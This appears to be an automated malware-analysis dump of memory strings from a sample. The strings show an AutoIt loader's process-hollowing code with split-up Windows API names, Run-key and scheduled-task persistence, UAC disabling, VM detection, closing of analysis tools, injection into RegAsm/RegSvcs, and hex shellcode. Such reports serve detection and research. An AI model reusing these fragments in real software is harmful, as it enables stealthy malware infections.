Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $trelocraw = dllstructcreate("byte[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress)) memstr_3f303aa5-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $frelocate then _runbinary_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523) memstr_222969d9-8
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "write" & "proces" & "smemo" & "ry", "handle", $handlerpro, "ptr", $pzeropoint, "ptr", $pmodule, "dword_ptr", $ioptionalheadersizeofimagenew, "dword_ptr*", 0) memstr_f5648c2b-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $tpeb = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid") memstr_c25ca4d7-e
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "rea"&"dproces"&"sme"&"mory", "ptr", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0) memstr_32dfe5c5-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "writep" & "roc" & "essmem" & "ory", "handle", $handlerpro, "ptr", $ppeb, "ptr", dllstructgetptr($tpeb), "dword_ptr", dllstructgetsize($tpeb), "dword_ptr*", 0) memstr_432ab3b0-0
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($tcontext, "e" & "ax", $pzeropoint + $ientrypointnew) memstr_b8a02692-1
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $acall = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $hthread, "ptr", dllstructgetptr($tcontext)) memstr_4c017cd9-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "term"&"inatepr"&"ocess", "handle", $handlerpro, "dword", 0)+2{ memstr_387e6752-5
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $acall = dllcall("kernel32.dll", "dword", "resumethread", "handle", $hthread) memstr_14e12db1-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("kernel32.dll", "bool", "closehandle", "handle", $handlerpro) memstr_210308b0-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func _runbinary_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64) memstr_86047cca-7
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $timage_base_relocation = dllstructcreate("dword virtualaddress; dword sizeofblock", $pdata + $irelativemove) memstr_df28795c-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ivirtualaddress = dllstructgetdata($timage_base_relocation, "vir"&"tual"&"add"&"ress") memstr_4c311be2-6
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $isizeofblock = dllstructgetdata($timage_base_relocation, "sizeofblock") memstr_30309b9b-2
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $tenries = dllstructcreate("word[" & $inumberofentries & "]", dllstructgetptr($timage_base_relocation) + 8) memstr_1f7134ee-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if @error then return seterror(1, 0, 0) memstr_02676aa6-a
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($bufferasm, 1, $asm) memstr_67465d44-c
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if bitshift($idata, 12) = $iflag then memstr_394b7fdd-3
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $taddress = dllstructcreate("ptr", $pmodule + $ivirtualaddress + bitand($idata, 0xfff)) memstr_c3cb89bb-4
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllstructsetdata($taddress, 1, dllstructgetdata($taddress, 1) + $idelta) memstr_c6ddcff5-d
Source: sdadbtvsh.bin, 00000008.00000003.1554858554.0000000001857000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8___f3c3f786d6c2076657273696f6e3d223/2e302220656e636f64696e673d225554462d38222073746/6e646/6c6f6e653d22796573223f3e0d0*3c6/7373656d626c7920786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e763/22206d6/6e696665737456657273696f6e3d223/2e30223e0d0*20203c6/7373656d626c794964656e746974792076657273696f6e3d223/2e302e302e3022206e6/6d653d224d794/70706c69636/74696f6e2e6/7070222f3e0d0*20203c7472757374496e666f20786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7632223e0d0*202020203c73656375726974793e0d0*2020202020203c72657/75657374656450726976696c6567657320786d6c6e733d2275726e3*736368656d6/732d6d6963726f736f66742d636f6d3*6/736d2e7633223e0d0*20202020202020203c72657/756573746564457865637574696f6e4c6576656c206c6576656c3d226/73496e766f6_6572222075694/63636573733d22666/6c7365222f3e0d0*2020202020203c2f72657/75657374656450726976696c656765733e0d0*202020203c2f73656375726974793e0d0*20203c2f7472757374496e666f3e0d0*3c2f6/7373656d626c793e0d0* memstr_0ef2abaa-0
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \registry\machine\software\wow6432node\microsoft\windows\currentversion\run\registry\machine\software\wow6432node\microsoft\windows\currentversion\runh memstr_857d6f2b-d
Source: sdadbtvsh.bin, 00000008.00000003.1542791644.00000000015B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: y\machine\software\microsoft\windows\currentversion\run memstr_6744e2c5-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ntversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs")) memstr_0d84108b-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regwrite("hkcu64\software\microsoft\windows\currentversion\run", $key_vbsloader, "reg_sz", filegetshortname($dir3ctory_path & '\' & "update.vbs"))2 memstr_f52c04a3-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc memstr_c10617ab-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif47 memstr_c9cbbba2-f
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exitqk3 memstr_3e7068a9-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exit3a1 memstr_49572409-f
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif4t memstr_67e493fe-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc< memstr_9296181f-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif memstr_fb3860c1-a
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exitfv9 memstr_55cc2b71-c
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif! memstr_2c31b9a1-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif$h memstr_e4f339b3-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifqpq memstr_f4491f02-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elsec memstr_52429308-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exit048z memstr_18ac213e-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif4z memstr_1020c105-5
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endifr memstr_174e3a32-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @comspec & ' /c ' & "schtasks /create /sc minute /mo 30 /tn " & $taskname & " /tr" & ' "' & filegetshortname($dir3ctory_path & "\" & $exec) & " " & filegetshortname($dir3ctory_path & "\" & $auex) & '"', "", @sw_hide) memstr_8d54621e-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regwrite("hklm64\software\microsoft\windows\currentversion\policies\system", "enablelua", "reg_dword", "0") memstr_44f006be-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("vboxservice.exe") then2ji memstr_5eea811a-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareuser.exe") then memstr_1b8b0259-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if drivespacefree("d:\") < 1 and processexists("vmwareservice.exe") theng4 memstr_55e08284-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $startupkey = iniread($settingsfn, $ini_settings, "key", '').v memstr_1f510b0d-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(11, 0, 0)hku memstr_3a2c2218-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(10, 0, 0) memstr_1606ee7f-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(9, 0, 0)p0 memstr_93aa6083-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(7, 0, 0)q memstr_4cf25955-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(8, 0, 0) memstr_0f4aa0b9-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $binary = "" then exit4uu memstr_a78e2066-c
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("mshta.exe")e memstr_565e2a51-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $inject_net4_regsvc memstr_cc47f09e-4
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $inject_net2_regasm7] memstr_736e9aad-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(2, 0, 0) memstr_ae8c008e-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $short = "start.lnk" memstr_4af1ec03-5
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("regshot.exe") memstr_b260c18d-c
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $irunflag, $tcontext< memstr_abc9e610-7
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(6, 0, 0) memstr_d67318c4-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $inject_net2_regsvc memstr_9ed801e5-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func denario($var92 = "-1") memstr_02cd08e8-6
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if not $frelocatable then memstr_966ff3db-e
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $context_full = 0x100007$ memstr_fca93851-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(101, 1, 0)2 memstr_2789c223-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $script = "start.vbs" memstr_e1e24ab3-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(101, 0, 0)l memstr_5092e576-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("taskmgr.exe") memstr_0daf4a7d-0
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func mainpe($executename) memstr_d8a50cab-a
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe") memstr_e42f5b83-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process hacker")9- memstr_cf194dd0-f
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(3, 0, 0)2s3% memstr_cd6fb333-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(5, 0, 0) memstr_c2d7a7d6-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9l%}5 memstr_fbb9d4c2-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $inject_tw_u_nk_329l%}5 memstr_fcbb7977-b
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("tcpeye") then memstr_eeb8ca5e-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(4, 0, 0) memstr_5332d881-9
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return seterror(102, 0, 0) memstr_9deda46f-3
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elseif $imagic = 523 thenqx memstr_56600da4-2
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("taskmgr.exe")m memstr_edfe7f0f-1
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $inject_net4_regasm memstr_5535a6dc-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("tcpeye.exe")y265yd95l6246 memstr_3db71ab8-8
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rtup1 = regread("hkcu64\software\microsoft\windows\currentversion\runonce", $startupkey)l memstr_e82319ee-d
Source: sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $startup1 = $install_path & "\" & $install_fo memstr_990f6241-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespaceataddress($handlerpro, $paddress, $isize)+ memstr_5412128e-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "virt"&"uala"&"llo"&"cex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x1000, "dword", 64)) memstr_d9688e74-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $acall = dllcall("kernel32.dll", "ptr", "vi"&"rtualal"&"loc"&"ex", "handle", $handlerpro, "ptr", $paddress, "dword_ptr", $isize, "dword", 0x3000, "dword", 64)) memstr_a735e083-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $acall = dllcall("kernel32.dll", "ptr", "vir"&"tua"&"lalloc"&"ex", "handle", $handlerpro, "ptr", 0, "dword_ptr", $isize, "dword", 0x3000, "dword", 64) memstr_d8744225-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dllcall("ntdll.dll", "int", "n"&"tunm"&"apviewo"&"fsection", "ptr", $handlerpro, "ptr", $paddress) memstr_d2aa3485-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $acall = dllcall("kernel32.dll", "bool", "iswow"&"64pr"&"oce"&"ss", "handle", $handlerpro, "bool*", 0) memstr_c0711567-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")/ memstr_ae777ec9-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)w memstr_393d9395-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"u memstr_04bc1b7e-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"u memstr_acb16668-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"u memstr_70936b45-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"u memstr_0f052803-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"u memstr_ec97cf0e-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"u memstr_02b788e9-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"u memstr_e6e021f4-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////" memstr_80a1a5f6-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @<xbo memstr_7e826959-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g%(ao memstr_722a9c72-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r332o memstr_c5312abf-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h)hao memstr_d6bad6e1-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s3tt!ng memstr_313da493-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: leh-t"]m memstr_739ca6c7-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stpthso memstr_5aa47df9-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g#hao memstr_3a7fa0fa-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h+>]y memstr_1d22cd0a-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: g#xbo memstr_469dcfc3-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szy] memstr_83f1576d-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: auex*^t memstr_8e7ecb4f-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exec8^f memstr_6726a6b5-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h/b^, memstr_1d5a3fd7-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m'a^/ memstr_7cb3e771-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6j^4 memstr_c1f2985f-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6yh$o memstr_19d47174-2
